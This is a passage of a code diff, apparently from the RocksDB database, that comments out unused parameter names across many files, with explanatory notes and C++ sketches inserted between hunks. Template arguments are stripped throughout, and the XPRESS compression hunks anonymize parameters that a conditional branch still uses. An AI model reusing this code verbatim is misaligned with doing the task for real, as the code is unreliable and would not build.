uint64_t 
diff --git a/table/mock_table.h b/table/mock_table.h
index 9e5396341c5..eca85d1b26c 100644
--- a/table/mock_table.h
+++ b/table/mock_table.h
@@ -46,7 +46,7 @@ class MockTableReader : public TableReader {
   Status Get(const ReadOptions&, const Slice& key, GetContext* get_context,
              bool skip_filters = false) override;

-  uint64_t ApproximateOffsetOf(const Slice& key) override { return 0; }
+  uint64_t ApproximateOffsetOf(const Slice& /*key*/) override { return 0; }

   virtual size_t ApproximateMemoryUsage() const override { return 0; }

@@ -169,8 +169,8 @@ class MockTableFactory : public TableFactory {
                       stl_wrappers::KVMap file_contents);

   virtual Status SanitizeOptions(
-      const DBOptions& db_opts,
-      const ColumnFamilyOptions& cf_opts) const override {
+      const DBOptions& /*db_opts*/,
+      const ColumnFamilyOptions& /*cf_opts*/) const override {
     return Status::OK();
   }
diff --git a/table/partitioned_filter_block.cc b/table/partitioned_filter_block.cc
index 2b330039e50..6a491ad9f06 100644
--- a/table/partitioned_filter_block.cc
+++ b/table/partitioned_filter_block.cc
@@ -87,7 +87,7 @@ Slice PartitionedFilterBlockBuilder::Finish(

 PartitionedFilterBlockReader::PartitionedFilterBlockReader(
     const SliceTransform* prefix_extractor, bool _whole_key_filtering,
-    BlockContents&& contents, FilterBitsReader* filter_bits_reader,
+    BlockContents&& contents, FilterBitsReader* /*filter_bits_reader*/,
     Statistics* stats, const Comparator& comparator,
     const BlockBasedTable* table)
     : FilterBlockReader(contents.data.size(), stats, _whole_key_filtering),
diff --git a/table/partitioned_filter_block_test.cc b/table/partitioned_filter_block_test.cc
index a49143dae2f..86d31a4a703 100644
--- a/table/partitioned_filter_block_test.cc
+++ b/table/partitioned_filter_block_test.cc
@@ -25,8 +25,8 @@ class MockedBlockBasedTable : public BlockBasedTable {
   explicit MockedBlockBasedTable(Rep* rep) : BlockBasedTable(rep) {}

   virtual CachableEntry GetFilter(
-      const BlockHandle& filter_blk_handle, const bool is_a_filter_partition,
-      bool no_io) const override {
+      const BlockHandle& filter_blk_handle,
+      const bool /*is_a_filter_partition*/, bool /*no_io*/) const override {
     Slice slice = slices[filter_blk_handle.offset()];
     auto obj = new FullFilterBlockReader(
         nullptr, true, BlockContents(slice, false, kNoCompression),
diff --git a/table/plain_table_factory.cc b/table/plain_table_factory.cc
index eadc2c0995f..7a07de731e4 100644
--- a/table/plain_table_factory.cc
+++ b/table/plain_table_factory.cc
@@ -18,7 +18,7 @@ Status PlainTableFactory::NewTableReader(
     const TableReaderOptions& table_reader_options,
     unique_ptr&& file, uint64_t file_size,
     unique_ptr* table,
-    bool prefetch_index_and_filter_in_cache) const {
+    bool /*prefetch_index_and_filter_in_cache*/) const {
   return PlainTableReader::Open(
       table_reader_options.ioptions, table_reader_options.env_options,
       table_reader_options.internal_comparator, std::move(file), file_size,
diff --git a/table/plain_table_factory.h b/table/plain_table_factory.h
index 33cd3134719..37c120a0fa6 100644
--- a/table/plain_table_factory.h
+++ b/table/plain_table_factory.h
@@ -163,8 +163,9 @@ class PlainTableFactory : public TableFactory {
   static const char kValueTypeSeqId0 = char(0xFF);

   // Sanitizes the specified DB Options.
-  Status SanitizeOptions(const DBOptions& db_opts,
-                         const ColumnFamilyOptions& cf_opts) const override {
+  Status SanitizeOptions(
+      const DBOptions& /*db_opts*/,
+      const ColumnFamilyOptions& /*cf_opts*/) const override {
     return Status::OK();
   }
diff --git a/table/plain_table_key_coding.cc b/table/plain_table_key_coding.cc
index 3e87c03d13f..6f5ee9b4ad2 100644
--- a/table/plain_table_key_coding.cc
+++ b/table/plain_table_key_coding.cc
@@ -288,7 +288,7 @@ Status PlainTableKeyDecoder::NextPlainEncodingKey(uint32_t start_offset,
                                                   ParsedInternalKey* parsed_key,
                                                   Slice* internal_key,
                                                   uint32_t* bytes_read,
-                                                  bool* seekable) {
+                                                  bool* /*seekable*/) {
   uint32_t user_key_size = 0;
   Status s;
   if (fixed_user_key_len_ != kPlainTableVariableLength) {
diff --git a/table/plain_table_reader.cc b/table/plain_table_reader.cc
index 0f9449e8669..8089dcd0798 100644
--- a/table/plain_table_reader.cc
+++ b/table/plain_table_reader.cc
@@ -192,7 +192,7 @@ void PlainTableReader::SetupForCompaction() {
 InternalIterator* PlainTableReader::NewIterator(const ReadOptions& options,
                                                 Arena* arena,
                                                 const InternalKeyComparator*,
-                                                bool skip_filters) {
+                                                bool /*skip_filters*/) {
   bool use_prefix_seek = !IsTotalOrderMode() && !options.total_order_seek;
   if (arena == nullptr) {
     return new PlainTableIterator(this, use_prefix_seek);
@@ -537,8 +537,8 @@ void PlainTableReader::Prepare(const Slice& target) {
   }
 }

-Status PlainTableReader::Get(const ReadOptions& ro, const Slice& target,
-                             GetContext* get_context, bool skip_filters) {
+Status PlainTableReader::Get(const ReadOptions& /*ro*/, const Slice& target,
+                             GetContext* get_context, bool /*skip_filters*/) {
   // Check bloom filter first.
   Slice prefix_slice;
   uint32_t prefix_hash;
@@ -602,7 +602,7 @@ Status PlainTableReader::Get(const ReadOptions& ro, const Slice& target,
   return Status::OK();
 }

-uint64_t PlainTableReader::ApproximateOffsetOf(const Slice& key) {
+uint64_t PlainTableReader::ApproximateOffsetOf(const Slice& /*key*/) {
   return 0;
 }

@@ -706,7 +706,7 @@ void PlainTableIterator::Seek(const Slice& target) {
   }
 }

-void PlainTableIterator::SeekForPrev(const Slice& target) {
+void PlainTableIterator::SeekForPrev(const Slice& /*target*/) {
   assert(false);
   status_ =
       Status::NotSupported("SeekForPrev() is not supported in PlainTable");
diff --git a/table/sst_file_writer_collectors.h b/table/sst_file_writer_collectors.h
index ce3a45f5a74..89e0970d816 100644
--- a/table/sst_file_writer_collectors.h
+++ b/table/sst_file_writer_collectors.h
@@ -26,8 +26,8 @@ class SstFileWriterPropertiesCollector : public IntTblPropCollector {
                                     SequenceNumber global_seqno)
       : version_(version), global_seqno_(global_seqno) {}

-  virtual Status InternalAdd(const Slice& key, const Slice& value,
-                             uint64_t file_size) override {
+  virtual Status InternalAdd(const Slice& /*key*/, const Slice& /*value*/,
+                             uint64_t /*file_size*/) override {
     // Intentionally left blank. Have no interest in collecting stats for
     // individual key/value pairs.
     return Status::OK();
@@ -68,7 +68,7 @@ class SstFileWriterPropertiesCollectorFactory
       : version_(version), global_seqno_(global_seqno) {}

   virtual IntTblPropCollector* CreateIntTblPropCollector(
-      uint32_t column_family_id) override {
+      uint32_t /*column_family_id*/) override {
     return new SstFileWriterPropertiesCollector(version_, global_seqno_);
   }
diff --git a/table/table_reader.h b/table/table_reader.h
index 5f47468e6de..9f137dab18d 100644
--- a/table/table_reader.h
+++ b/table/table_reader.h
@@ -44,7 +44,7 @@ class TableReader {
                                 bool skip_filters = false) = 0;

   virtual InternalIterator* NewRangeTombstoneIterator(
-      const ReadOptions& read_options) {
+      const ReadOptions& /*read_options*/) {
     return nullptr;
   }

@@ -63,7 +63,7 @@ class TableReader {
   virtual std::shared_ptr GetTableProperties() const = 0;

   // Prepare work that can be done before the real Get()
-  virtual void Prepare(const Slice& target) {}
+  virtual void Prepare(const Slice& /*target*/) {}

   // Report an approximation of how much memory has been used.
   virtual size_t ApproximateMemoryUsage() const = 0;
@@ -95,7 +95,7 @@ class TableReader {
   }

   // convert db file to a human readable form
-  virtual Status DumpTable(WritableFile* out_file) {
+  virtual Status DumpTable(WritableFile* /*out_file*/) {
     return Status::NotSupported("DumpTable() not supported");
   }
diff --git a/table/table_test.cc b/table/table_test.cc
index c55eb425576..a1f6a5b6e3f 100644
--- a/table/table_test.cc
+++ b/table/table_test.cc
@@ -66,9 +66,13 @@ class DummyPropertiesCollector : public TablePropertiesCollector {
  public:
   const char* Name() const { return ""; }

-  Status Finish(UserCollectedProperties* properties) { return Status::OK(); }
+  Status Finish(UserCollectedProperties* /*properties*/) {
+    return Status::OK();
+  }

-  Status Add(const Slice& user_key, const Slice& value) { return Status::OK(); }
+  Status Add(const Slice& /*user_key*/, const Slice& /*value*/) {
+    return Status::OK();
+  }

   virtual UserCollectedProperties GetReadableProperties() const {
     return UserCollectedProperties{};
@@ -79,7 +83,7 @@ class DummyPropertiesCollectorFactory1
     : public TablePropertiesCollectorFactory {
  public:
   virtual TablePropertiesCollector* CreateTablePropertiesCollector(
-      TablePropertiesCollectorFactory::Context context) {
+      TablePropertiesCollectorFactory::Context /*context*/) {
     return new DummyPropertiesCollector();
   }
   const char* Name() const { return "DummyPropertiesCollector1"; }
@@ -89,7 +93,7 @@ class DummyPropertiesCollectorFactory2
     : public TablePropertiesCollectorFactory {
  public:
   virtual TablePropertiesCollector* CreateTablePropertiesCollector(
-      TablePropertiesCollectorFactory::Context context) {
+      TablePropertiesCollectorFactory::Context /*context*/) {
     return new DummyPropertiesCollector();
   }
   const char* Name() const { return "DummyPropertiesCollector2"; }
@@ -207,11 +211,11 @@ class BlockConstructor: public Constructor {
   ~BlockConstructor() {
     delete block_;
   }
-  virtual Status FinishImpl(const Options& options,
-                            const ImmutableCFOptions& ioptions,
-                            const BlockBasedTableOptions& table_options,
-                            const InternalKeyComparator& internal_comparator,
-                            const stl_wrappers::KVMap& kv_map) override {
+  virtual Status FinishImpl(
+      const Options& /*options*/, const ImmutableCFOptions& /*ioptions*/,
+      const BlockBasedTableOptions& table_options,
+      const InternalKeyComparator& /*internal_comparator*/,
+      const stl_wrappers::KVMap& kv_map) override {
     delete block_;
     block_ = nullptr;
     BlockBuilder builder(table_options.block_restart_interval);
@@ -305,7 +309,7 @@ class TableConstructor: public Constructor {
   virtual Status FinishImpl(const Options& options,
                             const ImmutableCFOptions& ioptions,
-                            const BlockBasedTableOptions& table_options,
+                            const BlockBasedTableOptions& /*table_options*/,
                             const InternalKeyComparator& internal_comparator,
                             const stl_wrappers::KVMap& kv_map) override {
     Reset();
@@ -433,10 +437,11 @@ class MemTableConstructor: public Constructor {
   ~MemTableConstructor() {
     delete memtable_->Unref();
   }
-  virtual Status FinishImpl(const Options&, const ImmutableCFOptions& ioptions,
-                            const BlockBasedTableOptions& table_options,
-                            const InternalKeyComparator& internal_comparator,
-                            const stl_wrappers::KVMap& kv_map) override {
+  virtual Status FinishImpl(
+      const Options&, const ImmutableCFOptions& ioptions,
+      const BlockBasedTableOptions& /*table_options*/,
+      const InternalKeyComparator& /*internal_comparator*/,
+      const stl_wrappers::KVMap& kv_map) override {
     delete memtable_->Unref();
     ImmutableCFOptions mem_ioptions(ioptions);
     memtable_ = new MemTable(internal_comparator_, mem_ioptions,
@@ -499,11 +504,11 @@ class DBConstructor: public Constructor {
   ~DBConstructor() {
     delete db_;
   }
-  virtual Status FinishImpl(const Options& options,
-                            const ImmutableCFOptions& ioptions,
-                            const BlockBasedTableOptions& table_options,
-                            const InternalKeyComparator& internal_comparator,
-                            const stl_wrappers::KVMap& kv_map) override {
+  virtual Status FinishImpl(
+      const Options& /*options*/, const ImmutableCFOptions& /*ioptions*/,
+      const BlockBasedTableOptions& /*table_options*/,
+      const InternalKeyComparator& /*internal_comparator*/,
+      const stl_wrappers::KVMap& kv_map) override {
     delete db_;
     db_ = nullptr;
     NewDB();
@@ -665,7 +670,7 @@ class FixedOrLessPrefixTransform : public SliceTransform {
     return Slice(src.data(), prefix_len_);
   }

-  virtual bool InDomain(const Slice& src) const override { return true; }
+  virtual bool InDomain(const Slice& /*src*/) const override { return true; }

   virtual bool InRange(const Slice& dst) const override {
     return (dst.size() <= prefix_len_);
@@ -795,7 +800,7 @@ class HarnessTest : public testing::Test {
     TestRandomAccess(rnd, keys, data);
   }

-  void TestForwardScan(const std::vector& keys,
+  void TestForwardScan(const std::vector& /*keys*/,
                        const stl_wrappers::KVMap& data) {
     InternalIterator* iter = constructor_->NewIterator();
     ASSERT_TRUE(!iter->Valid());
@@ -813,7 +818,7 @@ class HarnessTest : public testing::Test {
     }
   }

-  void TestBackwardScan(const std::vector& keys,
+  void TestBackwardScan(const std::vector& /*keys*/,
                         const stl_wrappers::KVMap& data) {
     InternalIterator* iter = constructor_->NewIterator();
     ASSERT_TRUE(!iter->Valid());
@@ -1528,7 +1533,7 @@ static std::string RandomString(Random* rnd, int len) {
 }

 void AddInternalKey(TableConstructor* c, const std::string& prefix,
-                    int suffix_len = 800) {
+                    int /*suffix_len*/ = 800) {
   static Random rnd(1023);
   InternalKey k(prefix + RandomString(&rnd, 800), 0, kTypeValue);
   c->Add(k.Encode().ToString(), "v");
@@ -2865,7 +2870,7 @@ class TestPrefixExtractor : public rocksdb::SliceTransform {
     return true;
   }

-  bool InRange(const rocksdb::Slice& dst) const override { return true; }
+  bool InRange(const rocksdb::Slice& /*dst*/) const override { return true; }

   bool IsValid(const rocksdb::Slice& src) const {
     if (src.size() != 4) {
diff --git a/third-party/fbson/FbsonDocument.h b/third-party/fbson/FbsonDocument.h
index 6fb8a93f171..fc7ca76ff38 100644
--- a/third-party/fbson/FbsonDocument.h
+++ b/third-party/fbson/FbsonDocument.h
@@ -355,7 +355,7 @@ class NumberValT : public FbsonValue {
   unsigned int numPackedBytes() const { return sizeof(FbsonValue) + sizeof(T); }

   // catch all unknow specialization of the template class
-  bool setVal(T value) { return false; }
+  bool setVal(T /*value*/) { return false; }

 private:
   T num_;
diff --git a/tools/db_bench_tool.cc b/tools/db_bench_tool.cc
index 0cc424eeab2..dfa00de5adc 100644
--- a/tools/db_bench_tool.cc
+++ b/tools/db_bench_tool.cc
@@ -235,7 +235,7 @@ DEFINE_bool(use_uint64_comparator, false, "use Uint64 user comparator");

 DEFINE_int64(batch_size, 1, "Batch size");

-static bool ValidateKeySize(const char* flagname, int32_t value) {
+static bool ValidateKeySize(const char* /*flagname*/, int32_t /*value*/) {
   return true;
 }

@@ -2041,8 +2041,9 @@ class Benchmark {
     explicit ExpiredTimeFilter(
         const std::shared_ptr& timestamp_emulator)
         : timestamp_emulator_(timestamp_emulator) {}
-    bool Filter(int level, const Slice& key, const Slice& existing_value,
-                std::string* new_value, bool* value_changed) const override {
+    bool Filter(int /*level*/, const Slice& key,
+                const Slice& /*existing_value*/, std::string* /*new_value*/,
+                bool* /*value_changed*/) const override {
       return KeyExpired(timestamp_emulator_.get(), key);
     }
     const char* Name() const override { return "ExpiredTimeFilter"; }
@@ -3351,12 +3352,9 @@ void VerifyDBFromDB(std::string& truth_db_name) {

 class KeyGenerator {
  public:
-  KeyGenerator(Random64* rand, WriteMode mode,
-               uint64_t num, uint64_t num_per_set = 64 * 1024)
-    : rand_(rand),
-      mode_(mode),
-      num_(num),
-      next_(0) {
+  KeyGenerator(Random64* rand, WriteMode mode, uint64_t num,
+               uint64_t /*num_per_set*/ = 64 * 1024)
+      : rand_(rand), mode_(mode), num_(num), next_(0) {
     if (mode_ == UNIQUE_RANDOM) {
       // NOTE: if memory consumption of this approach becomes a concern,
       // we can either break it into pieces and only random shuffle a section
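Note the pattern in the ExpiredTimeFilter and KeyGenerator hunks above: only the parameters the body never reads are anonymized, while the ones still used (key, rand, mode, num) keep their names. A sketch of that mixed case, using a simplified filter interface rather than the real rocksdb::CompactionFilter:

#include <string>

struct Slice {};  // stand-in for rocksdb::Slice

class FilterBase {
 public:
  virtual ~FilterBase() {}
  virtual bool Filter(int level, const Slice& key, const Slice& existing_value,
                      std::string* new_value, bool* value_changed) const = 0;
};

class KeyOnlyFilter : public FilterBase {
 public:
  bool Filter(int /*level*/, const Slice& key, const Slice& /*existing_value*/,
              std::string* /*new_value*/,
              bool* /*value_changed*/) const override {
    return KeyExpired(key);  // only `key` is consulted, so only it stays named
  }

 private:
  static bool KeyExpired(const Slice& /*key*/) { return false; }  // placeholder
};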
diff --git a/tools/ldb_cmd.cc b/tools/ldb_cmd.cc
index 2cd4d94d112..1c02ef64026 100644
--- a/tools/ldb_cmd.cc
+++ b/tools/ldb_cmd.cc
@@ -111,7 +111,7 @@ LDBCommand* LDBCommand::InitFromCmdLineArgs(
 LDBCommand* LDBCommand::InitFromCmdLineArgs(
     const std::vector& args, const Options& options,
     const LDBOptions& ldb_options,
-    const std::vector* column_families,
+    const std::vector* /*column_families*/,
     const std::function& selector) {
   // --x=y command line arguments are added as x->y map entries in
   // parsed_params.option_map.
@@ -456,7 +456,7 @@ std::vector LDBCommand::BuildCmdLineOptions(
  * updated.
  */
 bool LDBCommand::ParseIntOption(
-    const std::map& options,
+    const std::map& /*options*/,
     const std::string& option, int& value,
     LDBCommandExecuteResult& exec_state) {
   std::map::const_iterator itr =
@@ -486,7 +486,7 @@ bool LDBCommand::ParseIntOption(
  * Returns false otherwise.
  */
 bool LDBCommand::ParseStringOption(
-    const std::map& options,
+    const std::map& /*options*/,
     const std::string& option, std::string* value) {
   auto itr = option_map_.find(option);
   if (itr != option_map_.end()) {
@@ -764,7 +764,7 @@ bool LDBCommand::StringToBool(std::string val) {
 }

 CompactorCommand::CompactorCommand(
-    const std::vector& params,
+    const std::vector& /*params*/,
     const std::map& options,
     const std::vector& flags)
     : LDBCommand(options, flags, false,
@@ -834,7 +834,7 @@ const std::string DBLoaderCommand::ARG_BULK_LOAD = "bulk_load";
 const std::string DBLoaderCommand::ARG_COMPACT = "compact";

 DBLoaderCommand::DBLoaderCommand(
-    const std::vector& params,
+    const std::vector& /*params*/,
     const std::map& options,
     const std::vector& flags)
     : LDBCommand(
@@ -950,7 +950,7 @@ void ManifestDumpCommand::Help(std::string& ret) {
 }

 ManifestDumpCommand::ManifestDumpCommand(
-    const std::vector& params,
+    const std::vector& /*params*/,
     const std::map& options,
     const std::vector& flags)
     : LDBCommand(
@@ -1145,7 +1145,7 @@ const std::string InternalDumpCommand::ARG_STATS = "stats";
 const std::string InternalDumpCommand::ARG_INPUT_KEY_HEX = "input_key_hex";

 InternalDumpCommand::InternalDumpCommand(
-    const std::vector& params,
+    const std::vector& /*params*/,
     const std::map& options,
     const std::vector& flags)
     : LDBCommand(
@@ -1284,7 +1284,7 @@ const std::string DBDumperCommand::ARG_STATS = "stats";
 const std::string DBDumperCommand::ARG_TTL_BUCKET = "bucket";

 DBDumperCommand::DBDumperCommand(
-    const std::vector& params,
+    const std::vector& /*params*/,
     const std::map& options,
     const std::vector& flags)
     : LDBCommand(options, flags, true,
@@ -1560,7 +1560,7 @@ const std::string ReduceDBLevelsCommand::ARG_PRINT_OLD_LEVELS =
     "print_old_levels";

 ReduceDBLevelsCommand::ReduceDBLevelsCommand(
-    const std::vector& params,
+    const std::vector& /*params*/,
     const std::map& options,
     const std::vector& flags)
     : LDBCommand(options, flags, false,
@@ -1689,7 +1689,7 @@ const std::string ChangeCompactionStyleCommand::ARG_NEW_COMPACTION_STYLE =
     "new_compaction_style";

 ChangeCompactionStyleCommand::ChangeCompactionStyleCommand(
-    const std::vector& params,
+    const std::vector& /*params*/,
     const std::map& options,
     const std::vector& flags)
     : LDBCommand(options, flags, false,
@@ -1826,7 +1826,7 @@ void ChangeCompactionStyleCommand::DoCommand() {
 namespace {

 struct StdErrReporter : public log::Reader::Reporter {
-  virtual void Corruption(size_t bytes, const Status& s) override {
+  virtual void Corruption(size_t /*bytes*/, const Status& s) override {
     std::cerr << "Corruption detected in log file " << s.ToString() << "\n";
   }
 };
@@ -1990,7 +1990,7 @@ const std::string WALDumperCommand::ARG_PRINT_VALUE = "print_value";
 const std::string WALDumperCommand::ARG_PRINT_HEADER = "header";

 WALDumperCommand::WALDumperCommand(
-    const std::vector& params,
+    const std::vector& /*params*/,
     const std::map& options,
     const std::vector& flags)
     : LDBCommand(options, flags, true,
@@ -2074,7 +2074,7 @@ void GetCommand::DoCommand() {
 // ----------------------------------------------------------------------------

 ApproxSizeCommand::ApproxSizeCommand(
-    const std::vector& params,
+    const std::vector& /*params*/,
     const std::map& options,
     const std::vector& flags)
     : LDBCommand(options, flags, true,
@@ -2190,7 +2190,7 @@ Options BatchPutCommand::PrepareOptionsForOpenDB() {

 // ----------------------------------------------------------------------------

-ScanCommand::ScanCommand(const std::vector& params,
+ScanCommand::ScanCommand(const std::vector& /*params*/,
                          const std::map& options,
                          const std::vector& flags)
     : LDBCommand(
@@ -2474,7 +2474,7 @@ const char* DBQuerierCommand::PUT_CMD = "put";
 const char* DBQuerierCommand::DELETE_CMD = "delete";

 DBQuerierCommand::DBQuerierCommand(
-    const std::vector& params,
+    const std::vector& /*params*/,
     const std::map& options,
     const std::vector& flags)
     : LDBCommand(
@@ -2553,7 +2553,7 @@ void DBQuerierCommand::DoCommand() {
 // ----------------------------------------------------------------------------

 CheckConsistencyCommand::CheckConsistencyCommand(
-    const std::vector& params,
+    const std::vector& /*params*/,
     const std::map& options,
     const std::vector& flags)
     : LDBCommand(options, flags, false, BuildCmdLineOptions({})) {}
@@ -2585,7 +2585,7 @@ void CheckConsistencyCommand::DoCommand() {
 const std::string CheckPointCommand::ARG_CHECKPOINT_DIR = "checkpoint_dir";

 CheckPointCommand::CheckPointCommand(
-    const std::vector& params,
+    const std::vector& /*params*/,
     const std::map& options,
     const std::vector& flags)
     : LDBCommand(options, flags, false /* is_read_only */,
@@ -2623,7 +2623,7 @@ void CheckPointCommand::DoCommand() {

 // ----------------------------------------------------------------------------

-RepairCommand::RepairCommand(const std::vector& params,
+RepairCommand::RepairCommand(const std::vector& /*params*/,
                              const std::map& options,
                              const std::vector& flags)
     : LDBCommand(options, flags, false, BuildCmdLineOptions({})) {}
@@ -2653,7 +2653,7 @@ const std::string BackupableCommand::ARG_BACKUP_DIR = "backup_dir";
 const std::string BackupableCommand::ARG_STDERR_LOG_LEVEL = "stderr_log_level";

 BackupableCommand::BackupableCommand(
-    const std::vector& params,
+    const std::vector& /*params*/,
     const std::map& options,
     const std::vector& flags)
     : LDBCommand(options, flags, false /* is_read_only */,
@@ -2831,7 +2831,7 @@ void DumpSstFile(std::string filename, bool output_hex, bool show_properties) {
 }  // namespace

 DBFileDumperCommand::DBFileDumperCommand(
-    const std::vector& params,
+    const std::vector& /*params*/,
     const std::map& options,
     const std::vector& flags)
     : LDBCommand(options, flags, true, BuildCmdLineOptions({})) {}
diff --git a/tools/ldb_tool.cc b/tools/ldb_tool.cc
index e8229ef7b91..b09076ecc61 100644
--- a/tools/ldb_tool.cc
+++ b/tools/ldb_tool.cc
@@ -13,7 +13,7 @@ namespace rocksdb {
 LDBOptions::LDBOptions() {}

 void LDBCommandRunner::PrintHelp(const LDBOptions& ldb_options,
-                                 const char* exec_name) {
+                                 const char* /*exec_name*/) {
   std::string ret;

   ret.append(ldb_options.print_help_header);
diff --git a/tools/sst_dump_tool.cc b/tools/sst_dump_tool.cc
index 2a1729c7651..6110d5d5c40 100644
--- a/tools/sst_dump_tool.cc
+++ b/tools/sst_dump_tool.cc
@@ -110,9 +110,9 @@ Status SstFileReader::GetTableReader(const std::string& file_path) {
 }

 Status SstFileReader::NewTableReader(
-    const ImmutableCFOptions& ioptions, const EnvOptions& soptions,
-    const InternalKeyComparator& internal_comparator, uint64_t file_size,
-    unique_ptr* table_reader) {
+    const ImmutableCFOptions& /*ioptions*/, const EnvOptions& /*soptions*/,
+    const InternalKeyComparator& /*internal_comparator*/, uint64_t file_size,
+    unique_ptr* /*table_reader*/) {
   // We need to turn off pre-fetching of index and filter nodes for
   // BlockBasedTable
   shared_ptr block_table_factory =
diff --git a/util/compression.h b/util/compression.h
index 468b961fbfd..b75672f1438 100644
--- a/util/compression.h
+++ b/util/compression.h
@@ -151,8 +151,9 @@ inline std::string CompressionTypeToString(CompressionType compression_type) {
 // 2 -- Zlib, BZip2 and LZ4 encode decompressed size as Varint32 just before the
 // start of compressed block. Snappy format is the same as version 1.

-inline bool Snappy_Compress(const CompressionOptions& opts, const char* input,
-                            size_t length, ::std::string* output) {
+inline bool Snappy_Compress(const CompressionOptions& /*opts*/,
+                            const char* input, size_t length,
+                            ::std::string* output) {
 #ifdef SNAPPY
   output->resize(snappy::MaxCompressedLength(length));
   size_t outlen;
@@ -381,10 +382,9 @@ inline char* Zlib_Uncompress(const char* input_data, size_t input_length,
 // block header
 // compress_format_version == 2 -- decompressed size is included in the block
 // header in varint32 format
-inline bool BZip2_Compress(const CompressionOptions& opts,
-                           uint32_t compress_format_version,
-                           const char* input, size_t length,
-                           ::std::string* output) {
+inline bool BZip2_Compress(const CompressionOptions& /*opts*/,
+                           uint32_t compress_format_version, const char* input,
+                           size_t length, ::std::string* output) {
 #ifdef BZIP2
   if (length > std::numeric_limits::max()) {
     // Can't compress more than 4GB
@@ -520,7 +520,7 @@ inline char* BZip2_Uncompress(const char* input_data, size_t input_length,
 // header in varint32 format
 // @param compression_dict Data for presetting the compression library's
 // dictionary.
-inline bool LZ4_Compress(const CompressionOptions& opts,
+inline bool LZ4_Compress(const CompressionOptions& /*opts*/,
                          uint32_t compress_format_version, const char* input,
                          size_t length, ::std::string* output,
                          const Slice compression_dict = Slice()) {
@@ -705,15 +705,17 @@ inline bool LZ4HC_Compress(const CompressionOptions& opts,
   return false;
 }

-inline bool XPRESS_Compress(const char* input, size_t length, std::string* output) {
+inline bool XPRESS_Compress(const char* /*input*/, size_t /*length*/,
+                            std::string* /*output*/) {
 #ifdef XPRESS
   return port::xpress::Compress(input, length, output);
 #endif
   return false;
 }

-inline char* XPRESS_Uncompress(const char* input_data, size_t input_length,
-                               int* decompress_size) {
+inline char* XPRESS_Uncompress(const char* /*input_data*/,
+                               size_t /*input_length*/,
+                               int* /*decompress_size*/) {
 #ifdef XPRESS
   return port::xpress::Decompress(input_data, input_length, decompress_size);
 #endif
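The compression.h hunks need extra care because parameter use depends on the build configuration: Snappy_Compress, BZip2_Compress, and LZ4_Compress anonymize only opts, which no branch reads, while input/length/output stay named for the #ifdef'd library calls. Anonymizing a name that an #ifdef branch still references (as the XPRESS hunks above do) compiles only when that branch is disabled. A hedged sketch of a configuration-safe variant; HAVE_LIB and lib_compress are placeholders, not real build flags or RocksDB APIs:

#include <cstddef>
#include <string>

#ifdef HAVE_LIB
bool lib_compress(const char* input, size_t length, std::string* output);
#endif

struct CompressionOptions {};

inline bool Compress(const CompressionOptions& /*opts*/, const char* input,
                     size_t length, std::string* output) {
#ifdef HAVE_LIB
  // The parameter names must stay visible for this branch.
  return lib_compress(input, length, output);
#else
  // This branch ignores everything; void-casts silence the warning without
  // breaking the HAVE_LIB build.
  (void)input;
  (void)length;
  (void)output;
  return false;
#endif
}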
diff --git a/util/delete_scheduler_test.cc b/util/delete_scheduler_test.cc
index 208bdd74177..7d531244c6d 100644
--- a/util/delete_scheduler_test.cc
+++ b/util/delete_scheduler_test.cc
@@ -239,7 +239,7 @@ TEST_F(DeleteSchedulerTest, DisableRateLimiting) {
   int bg_delete_file = 0;
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
+      [&](void* /*arg*/) { bg_delete_file++; });

   rocksdb::SyncPoint::GetInstance()->EnableProcessing();

@@ -346,7 +346,7 @@ TEST_F(DeleteSchedulerTest, StartBGEmptyTrashMultipleTimes) {
   int bg_delete_file = 0;
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
+      [&](void* /*arg*/) { bg_delete_file++; });
   rocksdb::SyncPoint::GetInstance()->EnableProcessing();

   rate_bytes_per_sec_ = 1024 * 1024;  // 1 MB / sec
@@ -381,7 +381,7 @@ TEST_F(DeleteSchedulerTest, DestructorWithNonEmptyQueue) {
   int bg_delete_file = 0;
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
+      [&](void* /*arg*/) { bg_delete_file++; });
   rocksdb::SyncPoint::GetInstance()->EnableProcessing();

   rate_bytes_per_sec_ = 1;  // 1 Byte / sec
@@ -410,7 +410,7 @@ TEST_F(DeleteSchedulerTest, MoveToTrashError) {
   int bg_delete_file = 0;
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
+      [&](void* /*arg*/) { bg_delete_file++; });
   rocksdb::SyncPoint::GetInstance()->EnableProcessing();

   rate_bytes_per_sec_ = 1024;  // 1 Kb / sec
@@ -436,10 +436,9 @@ TEST_F(DeleteSchedulerTest, DISABLED_DynamicRateLimiting1) {
   int fg_delete_file = 0;
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
+      [&](void* /*arg*/) { bg_delete_file++; });
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::DeleteFile",
-      [&](void* arg) { fg_delete_file++; });
+      "DeleteScheduler::DeleteFile", [&](void* /*arg*/) { fg_delete_file++; });
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "DeleteScheduler::BackgroundEmptyTrash:Wait",
       [&](void* arg) { penalties.push_back(*(static_cast(arg))); });
@@ -518,9 +517,9 @@ TEST_F(DeleteSchedulerTest, ImmediateDeleteOn25PercDBSize) {
   int fg_delete_file = 0;
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
+      [&](void* /*arg*/) { bg_delete_file++; });
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::DeleteFile", [&](void* arg) { fg_delete_file++; });
+      "DeleteScheduler::DeleteFile", [&](void* /*arg*/) { fg_delete_file++; });

   rocksdb::SyncPoint::GetInstance()->EnableProcessing();
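The delete_scheduler_test.cc hunks apply the same rule to lambdas: a callback that never touches its void* payload gets an unnamed parameter, while the one that actually reads arg (the penalties callback) keeps it. A self-contained sketch using plain std::function rather than the rocksdb SyncPoint API:

#include <functional>
#include <iostream>

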